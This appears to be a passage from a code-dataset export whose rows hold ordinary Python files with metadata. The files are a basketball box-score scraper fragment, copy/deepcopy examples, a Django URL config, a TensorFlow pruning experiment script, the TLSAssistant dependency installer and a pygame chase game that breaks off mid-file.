box_score.to_csv(f, header=header, index=False) | en | 0.403194 | Convert minutes played from analog time to digital time. :param str mp: minutes played, e.g. '24:30' :return int: e.g. 24.5 # 'fg3', 'fg3a', 'fg3_pct', # 'ft', 'fta', 'ft_pct', # 'orb', 'drb', 'trb', # 'ast', 'stl', 'blk', # 'tov', 'pf', # 'ts_pct', 'efg_pct', # 'fg3a_per_fga_pct', 'fta_per_fga_pct', # 'orb_pct', 'drb_pct', 'trb_pct', # 'ast_pct', 'stl_pct', 'blk_pct', Get the basic and advanced box scores for one team and one game. :param str team_name: the capitalized abbreviated name, e.g. 'DEN' :param str url: the URL to the box score page on basketball-reference.com :param pd.DataFrame schedule: contains game info for the schedule of games :return tuple: to be finished ... # BASIC BOX SCORE # Road team # Home team # reordered_cols = [ # 'DATE', 'PLAYER_NAME', 'OWN_TEAM', 'OPP_TEAM', 'VENUE', 'MP', # 'FG', 'FGA', 'FG%', '3P', '3PA', '3P%', 'FT', 'FTA', 'FT%', # 'ORB', 'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', # '+/-', 'USG%', 'PACE' # ] # basic = basic[reordered_cols] # ADVANCED BOX SCORE # Road team # Home team # reordered_cols = [ # 'DATE', 'PLAYER_NAME', 'OWN_TEAM', 'OPP_TEAM', 'VENUE', 'MP', # 'TS%', 'eFG%', '3PAr', 'FTr', 'ORB%', 'DRB%', 'TRB%', 'AST%', # 'STL%', 'BLK%', 'TOV%', 'USG%', 'ORtg', 'DRtg' # ] # adv = adv[reordered_cols] | 2.910384 | 3 |
stdlib/copy_qs.py | bpuderer/python-snippets27 | 3 | 6616733 | <filename>stdlib/copy_qs.py
import copy
# shallow copy
lista = [0, 1, 2]
#listb = lista[:]
#listb = list(lista)
listb = copy.copy(lista)
lista.append(3)
print lista
print listb
print "---"
# deep copy
lista = [[0, 1], [2, 3], 4]
listb = copy.deepcopy(lista)
lista[0].append(5)
print lista
print listb
print "---"
# shallow copy
dicta = {'a': 0, 'b': 1}
#dictb = dict(dicta)
dictb = copy.copy(dicta)
dicta['c'] = 2
print dicta
print dictb
print "---"
# deep copy
dicta = {'a': {'aa': 0}, 'b': 1}
dictb = copy.deepcopy(dicta)
dicta['a']['aaa'] = 2
print dicta
print dictb
print "---"
| <filename>stdlib/copy_qs.py
import copy
# shallow copy
lista = [0, 1, 2]
#listb = lista[:]
#listb = list(lista)
listb = copy.copy(lista)
lista.append(3)
print lista
print listb
print "---"
# deep copy
lista = [[0, 1], [2, 3], 4]
listb = copy.deepcopy(lista)
lista[0].append(5)
print lista
print listb
print "---"
# shallow copy
dicta = {'a': 0, 'b': 1}
#dictb = dict(dicta)
dictb = copy.copy(dicta)
dicta['c'] = 2
print dicta
print dictb
print "---"
# deep copy
dicta = {'a': {'aa': 0}, 'b': 1}
dictb = copy.deepcopy(dicta)
dicta['a']['aaa'] = 2
print dicta
print dictb
print "---"
| pt | 0.143809 | # shallow copy #listb = lista[:] #listb = list(lista) # deep copy # shallow copy #dictb = dict(dicta) # deep copy | 3.45086 | 3 |
mysite/urls.py | Chris7/django-frontends | 0 | 6616734 | from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.views.generic import TemplateView
from rest_framework import routers, serializers, viewsets
from polls.viewsets import ChoiceViewSet, PollViewSet
from polls.forms import ChoiceForm, PollForm
# Routers provide an easy way of automatically determining the URL conf.
router = routers.DefaultRouter()
router.register(r'poll', PollViewSet)
router.register(r'choice', ChoiceViewSet)
admin.autodiscover()
react_urls = patterns('',
url(r'^$', TemplateView.as_view(template_name='react/react.html'), {'poll_form': PollForm, 'choice_form': ChoiceForm}, name='react_index'),
)
urlpatterns = patterns('',
url(r'^polls/', include('polls.urls', namespace="polls")),
url(r'^admin/', include(admin.site.urls)),
url(r'^api/', include(router.urls, namespace='api')),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^react/', include(react_urls, namespace='react')),
) | from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.views.generic import TemplateView
from rest_framework import routers, serializers, viewsets
from polls.viewsets import ChoiceViewSet, PollViewSet
from polls.forms import ChoiceForm, PollForm
# Routers provide an easy way of automatically determining the URL conf.
router = routers.DefaultRouter()
router.register(r'poll', PollViewSet)
router.register(r'choice', ChoiceViewSet)
admin.autodiscover()
react_urls = patterns('',
url(r'^$', TemplateView.as_view(template_name='react/react.html'), {'poll_form': PollForm, 'choice_form': ChoiceForm}, name='react_index'),
)
urlpatterns = patterns('',
url(r'^polls/', include('polls.urls', namespace="polls")),
url(r'^admin/', include(admin.site.urls)),
url(r'^api/', include(router.urls, namespace='api')),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^react/', include(react_urls, namespace='react')),
) | en | 0.449923 | # Routers provide an easy way of automatically determining the URL conf. | 1.945945 | 2 |
spp/main.py | namhoonlee/spp-public | 13 | 6616735 | <gh_stars>10-100
import os
import sys
import argparse
import tensorflow as tf
import json
from dataset import Dataset
from model import Model
import prune
import check
import train
import test
import approximate_isometry
def parse_arguments():
parser = argparse.ArgumentParser()
# General
parser.add_argument('--nruns', type=int, default=1, help='the number of times to run the program')
# Data
parser.add_argument('--path_data', type=str, default='path_to_datasets', help='location of data sets')
parser.add_argument('--datasource', type=str, default='mnist', help='data set to use')
parser.add_argument('--aug_kinds', nargs='+', type=str, default=[], help='augmentation kinds to perform')
# Model
parser.add_argument('--arch', type=str, default='mlp-7-linear', help='model architecture')
# Initialization
parser.add_argument('--init_w', type=json.loads, default={'kind': 'orthogonal'}, help='initializer for w')
parser.add_argument('--init_b', type=json.loads, default={'kind': 'zeros'}, help='initializer for b')
# Pruning
parser.add_argument('--target_sparsity', type=float, default=0.9, help='target sparsity')
parser.add_argument('--datasource_pruning', type=str, default='mnist', help='data set to use for transfer pruning')
parser.add_argument('--transfer_pruning', action='store_true', help='use separate datasource for pruning')
# Train
parser.add_argument('--batch_size', type=int, default=100, help='number of examples in the mini-batch')
parser.add_argument('--train_iterations', type=int, default=10000, help='number of training iterations')
parser.add_argument('--optimizer', type=str, default='sgd', help='optimizer of choice')
parser.add_argument('--learning_rate', type=float, default=1e-1, help='initial learning rate')
parser.add_argument('--decay_type', type=str, default='constant', help='learning rate decay type')
parser.add_argument('--decay_boundaries', nargs='+', type=int, default=[], help='boundaries for piecewise_constant decay')
parser.add_argument('--decay_values', nargs='+', type=float, default=[], help='values for piecewise_constant decay')
parser.add_argument('--check_interval', type=int, default=100, help='check interval during training')
parser.add_argument('--save_interval', type=int, default=1000, help='save interval during training')
# Test
parser.add_argument('--num_eval_checkpoints', type=int, default=20, help='number of checkpoints to evaluate')
parser.add_argument('--no_load_cache', action='store_true', help='do not allow loading cache in test mode')
# Dynamical isometry
parser.add_argument('--check_jsv', action='store_true', help='check jacobian singular values')
parser.add_argument('--enforce_isometry', action='store_true', help='enforce approximate dynamical isometry')
args = parser.parse_args()
return args
def main():
args = parse_arguments()
# Multiple runs
for run in range(args.nruns):
# Start
print('--\nStart run ({})'.format(run))
# Set paths
path_save = 'run-{}'.format(run)
path_keys = ['model', 'log', 'assess']
args.path = {key: os.path.join(path_save, key) for key in path_keys}
# Reset the default graph and set a graph-level seed
tf.reset_default_graph()
tf.set_random_seed(seed=run)
# Dataset
dataset = Dataset(**vars(args))
if args.transfer_pruning:
dataset_pruning = Dataset(args.datasource_pruning, args.path_data)
# Model
model = Model(**vars(args))
model.construct_model()
# Session
sess = tf.InteractiveSession()
# Initialization
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
_ = sess.run([model.weights_init], {model.init: True})
if args.check_jsv:
check.jacobian_singular_value(args, model, sess, dataset, 'after-init')
# Prune
prune.prune(args, model, sess, dataset_pruning if args.transfer_pruning else dataset)
if args.check_jsv:
check.jacobian_singular_value(args, model, sess, dataset, 'after-prune')
# Enforce approximate dynamical isometry in the sparse network
if args.enforce_isometry:
approximate_isometry.optimize(args, model, sess, dataset)
if args.check_jsv:
check.jacobian_singular_value(args, model, sess, dataset, 'after-isometry')
# Train and test
train.train(args, model, sess, dataset)
test.test(args, model, sess, dataset)
# Closing
sess.close()
print('--\nFinish run ({})'.format(run))
sys.exit()
if __name__ == "__main__":
main()
| import os
import sys
import argparse
import tensorflow as tf
import json
from dataset import Dataset
from model import Model
import prune
import check
import train
import test
import approximate_isometry
def parse_arguments():
parser = argparse.ArgumentParser()
# General
parser.add_argument('--nruns', type=int, default=1, help='the number of times to run the program')
# Data
parser.add_argument('--path_data', type=str, default='path_to_datasets', help='location of data sets')
parser.add_argument('--datasource', type=str, default='mnist', help='data set to use')
parser.add_argument('--aug_kinds', nargs='+', type=str, default=[], help='augmentation kinds to perform')
# Model
parser.add_argument('--arch', type=str, default='mlp-7-linear', help='model architecture')
# Initialization
parser.add_argument('--init_w', type=json.loads, default={'kind': 'orthogonal'}, help='initializer for w')
parser.add_argument('--init_b', type=json.loads, default={'kind': 'zeros'}, help='initializer for b')
# Pruning
parser.add_argument('--target_sparsity', type=float, default=0.9, help='target sparsity')
parser.add_argument('--datasource_pruning', type=str, default='mnist', help='data set to use for transfer pruning')
parser.add_argument('--transfer_pruning', action='store_true', help='use separate datasource for pruning')
# Train
parser.add_argument('--batch_size', type=int, default=100, help='number of examples in the mini-batch')
parser.add_argument('--train_iterations', type=int, default=10000, help='number of training iterations')
parser.add_argument('--optimizer', type=str, default='sgd', help='optimizer of choice')
parser.add_argument('--learning_rate', type=float, default=1e-1, help='initial learning rate')
parser.add_argument('--decay_type', type=str, default='constant', help='learning rate decay type')
parser.add_argument('--decay_boundaries', nargs='+', type=int, default=[], help='boundaries for piecewise_constant decay')
parser.add_argument('--decay_values', nargs='+', type=float, default=[], help='values for piecewise_constant decay')
parser.add_argument('--check_interval', type=int, default=100, help='check interval during training')
parser.add_argument('--save_interval', type=int, default=1000, help='save interval during training')
# Test
parser.add_argument('--num_eval_checkpoints', type=int, default=20, help='number of checkpoints to evaluate')
parser.add_argument('--no_load_cache', action='store_true', help='do not allow loading cache in test mode')
# Dynamical isometry
parser.add_argument('--check_jsv', action='store_true', help='check jacobian singular values')
parser.add_argument('--enforce_isometry', action='store_true', help='enforce approximate dynamical isometry')
args = parser.parse_args()
return args
def main():
args = parse_arguments()
# Multiple runs
for run in range(args.nruns):
# Start
print('--\nStart run ({})'.format(run))
# Set paths
path_save = 'run-{}'.format(run)
path_keys = ['model', 'log', 'assess']
args.path = {key: os.path.join(path_save, key) for key in path_keys}
# Reset the default graph and set a graph-level seed
tf.reset_default_graph()
tf.set_random_seed(seed=run)
# Dataset
dataset = Dataset(**vars(args))
if args.transfer_pruning:
dataset_pruning = Dataset(args.datasource_pruning, args.path_data)
# Model
model = Model(**vars(args))
model.construct_model()
# Session
sess = tf.InteractiveSession()
# Initialization
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
_ = sess.run([model.weights_init], {model.init: True})
if args.check_jsv:
check.jacobian_singular_value(args, model, sess, dataset, 'after-init')
# Prune
prune.prune(args, model, sess, dataset_pruning if args.transfer_pruning else dataset)
if args.check_jsv:
check.jacobian_singular_value(args, model, sess, dataset, 'after-prune')
# Enforce approximate dynamical isometry in the sparse network
if args.enforce_isometry:
approximate_isometry.optimize(args, model, sess, dataset)
if args.check_jsv:
check.jacobian_singular_value(args, model, sess, dataset, 'after-isometry')
# Train and test
train.train(args, model, sess, dataset)
test.test(args, model, sess, dataset)
# Closing
sess.close()
print('--\nFinish run ({})'.format(run))
sys.exit()
if __name__ == "__main__":
main() | en | 0.681309 | # General # Data # Model # Initialization # Pruning # Train # Test # Dynamical isometry # Multiple runs # Start # Set paths # Reset the default graph and set a graph-level seed # Dataset # Model # Session # Initialization # Prune # Enforce approximate dynamical isometry in the sparse network # Train and test # Closing | 2.296268 | 2 |
install.py | turbostar190/tlsassistant | 18 | 6616736 | import asyncio
import json
import sys
import aiohttp
import async_timeout
from zipfile import ZipFile
from os import path, geteuid, mkdir, sep, remove, devnull, environ
import subprocess
import argparse
import logging
from shutil import rmtree as rm_rf
# parser for the arguments
from utils.logger import Logger
parser = argparse.ArgumentParser(
description="Installer for TLSAssistant"
) # todo: edit the description of the tool
parser.add_argument(
"-v", "--verbose", help="Verbose mode.", action="store_true"
) # verbose flag
args = parser.parse_args() # parse arguments
logger = Logger("INSTALLER")
if args.verbose: # if verbose is set
logging.basicConfig(level=logging.DEBUG) # logger is set to debug
else:
logging.basicConfig(level=logging.INFO) # logger is set to info
class Install:
def __init__(self, dependencies): # constructor
gits = []
pkgs = []
zips = []
cfgs = []
apts = []
logger.info("Loading dependencies...")
for dependency in dependencies: # for each dependency
if dependency["type"] == "git": # if it's git
gits.append(dependency["url"]) # append it's url to the git array
logger.debug(f"Added dependency git {dependency['url']}")
elif dependency["type"] == "pkg": # if it's pkg
pkgs.append(dependency["url"]) # append it's url to the pkg array
logger.debug(f"Added dependency pkg {dependency['url']}")
elif dependency["type"] == "apt": # if it's zip
apts.append(dependency["url"]) # append it's url to the zip array
logger.debug(f"Added dependency apt {dependency['url']}")
elif dependency["type"] == "zip": # if it's zip
zips.append(dependency["url"]) # append it's url to the zip array
logger.debug(f"Added dependency zip {dependency['url']}")
elif dependency["type"] == "cfg": # if it's cfg
cfgs.append(dependency["url"]) # append it's url to the cfg array
logger.debug(f"Added dependency cfg {dependency['url']}")
else: # if not found, throw warning
logger.warning(
f"Ignoring dependency {dependency['url']}, type {dependency['type']} is not recognized."
)
logger.info("Getting files...")
logger.debug("Getting all cfgs...")
loop = asyncio.get_event_loop()
results_apts = apts
results_cfgs = loop.run_until_complete(self.download(cfgs))
logger.debug(results_cfgs)
logger.debug("Getting all pkgs...")
loop = asyncio.get_event_loop() # asnychronous event loop
results_pkgs = loop.run_until_complete(
self.download(pkgs)
) # download asynchronously all the files
logger.debug(results_pkgs)
logger.debug("Getting all zips...")
loop = asyncio.get_event_loop()
results_zips = loop.run_until_complete(self.download(zips))
logger.debug(results_zips)
logger.debug("Getting all git...")
for git in gits: # for each git url,
file_name = self.get_filename(git) # get the file name
logger.info(f"getting {file_name}...")
self.git_clone(git) # and clone it
logger.info(f"{file_name} done.")
logger.info("Installing dependencies...")
logger.warning(
"This may take a while... Rerun the tool with -v to see the detailed installation."
)
self.apt_update()
self.install_dependencies("pkgs", results_pkgs) # install the dependencies pkg
self.install_dependencies("apts", results_apts) # install the dependencies pkg
logger.info("Unzipping dependencies...")
self.install_dependencies("zips", results_zips) # unzips the zips
logger.info("Generating Certificates...")
self.generate_cert()
logger.info("All done!")
def generate_cert(self):
logger.debug("Generating certificates...")
mkdir(f"dependencies{sep}certificates") # create the folder
with open(devnull, "w") as null:
subprocess.check_call(
[
"openssl",
"req",
"-x509",
"-newkey",
"rsa",
"-keyout",
f"dependencies{sep}certificates{sep}localuser.key",
"-out",
f"dependencies{sep}certificates{sep}localuser.crt",
"-nodes",
"-batch",
"-subj",
"/CN=Local User",
],
stderr=(
sys.stderr
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
)
def apt_update(self):
logger.debug("Updating repositories...")
with open(devnull, "w") as null:
subprocess.check_call(
["sudo", "apt-get", "update", "-y"],
stderr=sys.stderr,
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
)
def install_dependencies(self, type, results):
for file in results:
logger.info(f"Installing {file}...")
if type == "pkgs" or type == "apts":
logger.debug(f"Installing dependencies{sep}{file}")
f_path = f"./dependencies{sep}{file}"
with open(devnull, "w") as null:
subprocess.check_call(
[
"sudo",
"apt-get",
"install",
"-y",
f"{f_path if type == 'pkgs' else file}",
],
stderr=sys.stderr,
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
)
elif type == "zips":
logger.debug(f"Unzipping dependencies{sep}{file}")
with ZipFile(
f"dependencies{sep}{file}", "r"
) as zip: # while opening the zip
zip.extractall(
f"dependencies{sep}{file.rsplit('.', 1)[0]}"
) # extract it and remove the extension (myzip.zip) in the folder myzip
else: # if the type is not found, stop everything, we have an issue.
logger.error("no type found.")
raise AssertionError(
"The type given doesn't match one of the existing one."
)
if path.exists(
f"dependencies{sep}{file}"
): # delete the files .deb and .zip after all.
logger.debug(f"Removing file dependencies{sep}{file}")
remove(f"dependencies{sep}{file}")
def git_clone(self, url, path=None):
file_name = self.get_filename(url)
with open(devnull, "w") as null:
subprocess.call(
[
"git",
"clone",
str(url),
f"{path if path else 'dependencies' + sep + file_name}",
],
stderr=sys.stderr
if logging.getLogger().isEnabledFor(logging.DEBUG)
else null,
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(logging.DEBUG)
else null
),
)
async def get_url(self, url, session):
file_name = self.get_filename(url)
async with async_timeout.timeout(60):
async with session.get(url) as response:
with open(f"dependencies{sep}{file_name}", "wb") as fd:
async for data in response.content.iter_chunked(1024):
fd.write(data)
# logging.debug(f"Downloaded {url} in {file_name}")
return file_name
async def download(self, urls): # download asynchonously for faster downloads
async with aiohttp.ClientSession() as session:
tasks = [self.get_url(url, session) for url in urls] # load tasks
return await asyncio.gather(*tasks) # and gather them
def get_filename(self, url): # used to split and get the file name from http url
fragment_removed = url.split("#")[0]
query_string_removed = fragment_removed.split("?")[0]
scheme_removed = query_string_removed.split("://")[-1].split(":")[-1]
if scheme_removed.find("/") == -1:
return ""
return path.basename(scheme_removed)
def main(): # exec main
if not path.exists("dependencies"): # if can't find dependency folder
logger.debug("Folder dependencies does not exist. Creating a new one.")
else:
logger.debug("Folder dependencies exist. Removing and creating a new one.")
rm_rf("dependencies") # delete the folder
mkdir("dependencies") # create the folder
if path.exists("dependencies.json"): # if find the dependency file
with open("dependencies.json", "r") as dep: # load dependencies
data = dep.read()
dependencies = json.loads(data)
Install(dependencies) # install dependencies
else: # there's no file dependencies.json
logger.error("File not found, dependency links are missing. Abort.")
raise FileNotFoundError("File dependencies is not found, Abort.")
if __name__ == "__main__":
if geteuid() == 0 and not (
environ.get("TLSA_IN_A_DOCKER_CONTAINER", False)
): # check if sudo
logger.warning(
"Do not call the installer with SUDO, only some subprocess need SUDO."
)
logger.warning(
"By doing this you will install the entire dependencies on root."
)
input("If you want to continue, press Enter. Press CTRL+C to abort.")
main()
| import asyncio
import json
import sys
import aiohttp
import async_timeout
from zipfile import ZipFile
from os import path, geteuid, mkdir, sep, remove, devnull, environ
import subprocess
import argparse
import logging
from shutil import rmtree as rm_rf
# parser for the arguments
from utils.logger import Logger
parser = argparse.ArgumentParser(
description="Installer for TLSAssistant"
) # todo: edit the description of the tool
parser.add_argument(
"-v", "--verbose", help="Verbose mode.", action="store_true"
) # verbose flag
args = parser.parse_args() # parse arguments
logger = Logger("INSTALLER")
if args.verbose: # if verbose is set
logging.basicConfig(level=logging.DEBUG) # logger is set to debug
else:
logging.basicConfig(level=logging.INFO) # logger is set to info
class Install:
def __init__(self, dependencies): # constructor
gits = []
pkgs = []
zips = []
cfgs = []
apts = []
logger.info("Loading dependencies...")
for dependency in dependencies: # for each dependency
if dependency["type"] == "git": # if it's git
gits.append(dependency["url"]) # append it's url to the git array
logger.debug(f"Added dependency git {dependency['url']}")
elif dependency["type"] == "pkg": # if it's pkg
pkgs.append(dependency["url"]) # append it's url to the pkg array
logger.debug(f"Added dependency pkg {dependency['url']}")
elif dependency["type"] == "apt": # if it's zip
apts.append(dependency["url"]) # append it's url to the zip array
logger.debug(f"Added dependency apt {dependency['url']}")
elif dependency["type"] == "zip": # if it's zip
zips.append(dependency["url"]) # append it's url to the zip array
logger.debug(f"Added dependency zip {dependency['url']}")
elif dependency["type"] == "cfg": # if it's cfg
cfgs.append(dependency["url"]) # append it's url to the cfg array
logger.debug(f"Added dependency cfg {dependency['url']}")
else: # if not found, throw warning
logger.warning(
f"Ignoring dependency {dependency['url']}, type {dependency['type']} is not recognized."
)
logger.info("Getting files...")
logger.debug("Getting all cfgs...")
loop = asyncio.get_event_loop()
results_apts = apts
results_cfgs = loop.run_until_complete(self.download(cfgs))
logger.debug(results_cfgs)
logger.debug("Getting all pkgs...")
loop = asyncio.get_event_loop() # asnychronous event loop
results_pkgs = loop.run_until_complete(
self.download(pkgs)
) # download asynchronously all the files
logger.debug(results_pkgs)
logger.debug("Getting all zips...")
loop = asyncio.get_event_loop()
results_zips = loop.run_until_complete(self.download(zips))
logger.debug(results_zips)
logger.debug("Getting all git...")
for git in gits: # for each git url,
file_name = self.get_filename(git) # get the file name
logger.info(f"getting {file_name}...")
self.git_clone(git) # and clone it
logger.info(f"{file_name} done.")
logger.info("Installing dependencies...")
logger.warning(
"This may take a while... Rerun the tool with -v to see the detailed installation."
)
self.apt_update()
self.install_dependencies("pkgs", results_pkgs) # install the dependencies pkg
self.install_dependencies("apts", results_apts) # install the dependencies pkg
logger.info("Unzipping dependencies...")
self.install_dependencies("zips", results_zips) # unzips the zips
logger.info("Generating Certificates...")
self.generate_cert()
logger.info("All done!")
def generate_cert(self):
logger.debug("Generating certificates...")
mkdir(f"dependencies{sep}certificates") # create the folder
with open(devnull, "w") as null:
subprocess.check_call(
[
"openssl",
"req",
"-x509",
"-newkey",
"rsa",
"-keyout",
f"dependencies{sep}certificates{sep}localuser.key",
"-out",
f"dependencies{sep}certificates{sep}localuser.crt",
"-nodes",
"-batch",
"-subj",
"/CN=Local User",
],
stderr=(
sys.stderr
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
)
def apt_update(self):
logger.debug("Updating repositories...")
with open(devnull, "w") as null:
subprocess.check_call(
["sudo", "apt-get", "update", "-y"],
stderr=sys.stderr,
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
)
def install_dependencies(self, type, results):
for file in results:
logger.info(f"Installing {file}...")
if type == "pkgs" or type == "apts":
logger.debug(f"Installing dependencies{sep}{file}")
f_path = f"./dependencies{sep}{file}"
with open(devnull, "w") as null:
subprocess.check_call(
[
"sudo",
"apt-get",
"install",
"-y",
f"{f_path if type == 'pkgs' else file}",
],
stderr=sys.stderr,
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(
logging.DEBUG
) # if the user asked for debug mode, let him see the output.
else null # else /dev/null
),
)
elif type == "zips":
logger.debug(f"Unzipping dependencies{sep}{file}")
with ZipFile(
f"dependencies{sep}{file}", "r"
) as zip: # while opening the zip
zip.extractall(
f"dependencies{sep}{file.rsplit('.', 1)[0]}"
) # extract it and remove the extension (myzip.zip) in the folder myzip
else: # if the type is not found, stop everything, we have an issue.
logger.error("no type found.")
raise AssertionError(
"The type given doesn't match one of the existing one."
)
if path.exists(
f"dependencies{sep}{file}"
): # delete the files .deb and .zip after all.
logger.debug(f"Removing file dependencies{sep}{file}")
remove(f"dependencies{sep}{file}")
def git_clone(self, url, path=None):
file_name = self.get_filename(url)
with open(devnull, "w") as null:
subprocess.call(
[
"git",
"clone",
str(url),
f"{path if path else 'dependencies' + sep + file_name}",
],
stderr=sys.stderr
if logging.getLogger().isEnabledFor(logging.DEBUG)
else null,
stdout=(
sys.stdout
if logging.getLogger().isEnabledFor(logging.DEBUG)
else null
),
)
async def get_url(self, url, session):
file_name = self.get_filename(url)
async with async_timeout.timeout(60):
async with session.get(url) as response:
with open(f"dependencies{sep}{file_name}", "wb") as fd:
async for data in response.content.iter_chunked(1024):
fd.write(data)
# logging.debug(f"Downloaded {url} in {file_name}")
return file_name
async def download(self, urls): # download asynchonously for faster downloads
async with aiohttp.ClientSession() as session:
tasks = [self.get_url(url, session) for url in urls] # load tasks
return await asyncio.gather(*tasks) # and gather them
def get_filename(self, url): # used to split and get the file name from http url
fragment_removed = url.split("#")[0]
query_string_removed = fragment_removed.split("?")[0]
scheme_removed = query_string_removed.split("://")[-1].split(":")[-1]
if scheme_removed.find("/") == -1:
return ""
return path.basename(scheme_removed)
def main(): # exec main
if not path.exists("dependencies"): # if can't find dependency folder
logger.debug("Folder dependencies does not exist. Creating a new one.")
else:
logger.debug("Folder dependencies exist. Removing and creating a new one.")
rm_rf("dependencies") # delete the folder
mkdir("dependencies") # create the folder
if path.exists("dependencies.json"): # if find the dependency file
with open("dependencies.json", "r") as dep: # load dependencies
data = dep.read()
dependencies = json.loads(data)
Install(dependencies) # install dependencies
else: # there's no file dependencies.json
logger.error("File not found, dependency links are missing. Abort.")
raise FileNotFoundError("File dependencies is not found, Abort.")
if __name__ == "__main__":
if geteuid() == 0 and not (
environ.get("TLSA_IN_A_DOCKER_CONTAINER", False)
): # check if sudo
logger.warning(
"Do not call the installer with SUDO, only some subprocess need SUDO."
)
logger.warning(
"By doing this you will install the entire dependencies on root."
)
input("If you want to continue, press Enter. Press CTRL+C to abort.")
main()
| en | 0.826901 | # parser for the arguments # todo: edit the description of the tool # verbose flag # parse arguments # if verbose is set # logger is set to debug # logger is set to info # constructor # for each dependency # if it's git # append it's url to the git array # if it's pkg # append it's url to the pkg array # if it's zip # append it's url to the zip array # if it's zip # append it's url to the zip array # if it's cfg # append it's url to the cfg array # if not found, throw warning # asnychronous event loop # download asynchronously all the files # for each git url, # get the file name # and clone it # install the dependencies pkg # install the dependencies pkg # unzips the zips # create the folder # if the user asked for debug mode, let him see the output. # else /dev/null # if the user asked for debug mode, let him see the output. # else /dev/null # if the user asked for debug mode, let him see the output. # else /dev/null # if the user asked for debug mode, let him see the output. # else /dev/null # while opening the zip # extract it and remove the extension (myzip.zip) in the folder myzip # if the type is not found, stop everything, we have an issue. # delete the files .deb and .zip after all. # logging.debug(f"Downloaded {url} in {file_name}") # download asynchonously for faster downloads # load tasks # and gather them # used to split and get the file name from http url # exec main # if can't find dependency folder # delete the folder # create the folder # if find the dependency file # load dependencies # install dependencies # there's no file dependencies.json # check if sudo | 2.094399 | 2 |
collisiondetection/collisiondetection.py | BhanuPrakashNani/physics-simulation | 7 | 6616737 | from pygame import *
size_x = 1200
size_y = 700
class Object:
def disp(self, screen):
screen.blit(self.sprite, self.rect)
class Bad (Object):
def __init__(self):
self.sprite= image.load("police (1).bmp")
self.rect = self.sprite.get_rect()
self.rect.centerx = size_x / 2
self.rect.centery = size_y / 2
def chase(self, mouse):
if self.rect.centerx > S.rect.centerx:
self.rect.centerx-=10
if self.rect.centerx< S.rect.centerx:
self.rect.centerx+= 10
if self.rect.centery > S.rect.centery:
self.rect.centery-= 10
if self.rect.centery< S.rect.centery:
self.rect.centery+= 10
class gameover (Object):
def __init__(self):
self.sprite= image.load("projectgameover.bmp")
self.rect= self.sprite.get_rect()
self.rect.centerx=500
self.rect.centery=500
class Ship(Object):
def __init__(self):
self.sprite = image.load("car project.bmp")
self.rect = self.sprite.get_rect()
self.rect.centerx = 100
self.rect.centery = 100
def cycle (self):
self.rect.centerx, self.rect.centery=mouse.get_pos()
class shot(Object):
def __init__(self):
self.sprite = image.load("car project.bmp")
self.rect = self.sprite.get_rect()
self.rect.centerx=100
self.rect.centery=100
def cycle (self):
self.rect.centerx = S.rect.centerx
self.rect.centery = S.rect.centery-(S.sprite.get_width()/2)
for e in event.get():
if e.type==KEYDOWN:
if e.key==K_SPACE:
self.rect.centery-=10
init()
screen = display.set_mode((size_x, size_y))
B = Bad()
S = Ship()
g= gameover()
shot=shot()
clock = time.Clock()
while True:
for e in event.get():
if e.type == QUIT:
quit()
B.chase(S)
S.cycle()
shot.cycle()
screen.fill((255,255,255))
screen=display.set_mode((size_x,size_y))
screen=display.set_mode((size_x,size_y))
background=image.load("background (1).bmp")
background=transform.scale(background,(size_x,size_y))
screen.blit(background,(0,0))
S.disp(screen)
B.disp(screen)
shot.disp(screen)
display.flip()
clock.tick(60)
| from pygame import *
size_x = 1200
size_y = 700
class Object:
def disp(self, screen):
screen.blit(self.sprite, self.rect)
class Bad (Object):
def __init__(self):
self.sprite= image.load("police (1).bmp")
self.rect = self.sprite.get_rect()
self.rect.centerx = size_x / 2
self.rect.centery = size_y / 2
def chase(self, mouse):
if self.rect.centerx > S.rect.centerx:
self.rect.centerx-=10
if self.rect.centerx< S.rect.centerx:
self.rect.centerx+= 10
if self.rect.centery > S.rect.centery:
self.rect.centery-= 10
if self.rect.centery< S.rect.centery:
self.rect.centery+= 10
class gameover (Object):
def __init__(self):
self.sprite= image.load("projectgameover.bmp")
self.rect= self.sprite.get_rect()
self.rect.centerx=500
self.rect.centery=500
class Ship(Object):
def __init__(self):
self.sprite = image.load("car project.bmp")
self.rect = self.sprite.get_rect()
self.rect.centerx = 100
self.rect.centery = 100
def cycle (self):
self.rect.centerx, self.rect.centery=mouse.get_pos()
class shot(Object):
def __init__(self):
self.sprite = image.load("car project.bmp")
self.rect = self.sprite.get_rect()
self.rect.centerx=100
self.rect.centery=100
def cycle (self):
self.rect.centerx = S.rect.centerx
self.rect.centery = S.rect.centery-(S.sprite.get_width()/2)
for e in event.get():
if e.type==KEYDOWN:
if e.key==K_SPACE:
self.rect.centery-=10
init()
screen = display.set_mode((size_x, size_y))
B = Bad()
S = Ship()
g= gameover()
shot=shot()
clock = time.Clock()
while True:
for e in event.get():
if e.type == QUIT:
quit()
B.chase(S)
S.cycle()
shot.cycle()
screen.fill((255,255,255))
screen=display.set_mode((size_x,size_y))
screen=display.set_mode((size_x,size_y))
background=image.load("background (1).bmp")
background=transform.scale(background,(size_x,size_y))
screen.blit(background,(0,0))
S.disp(screen)
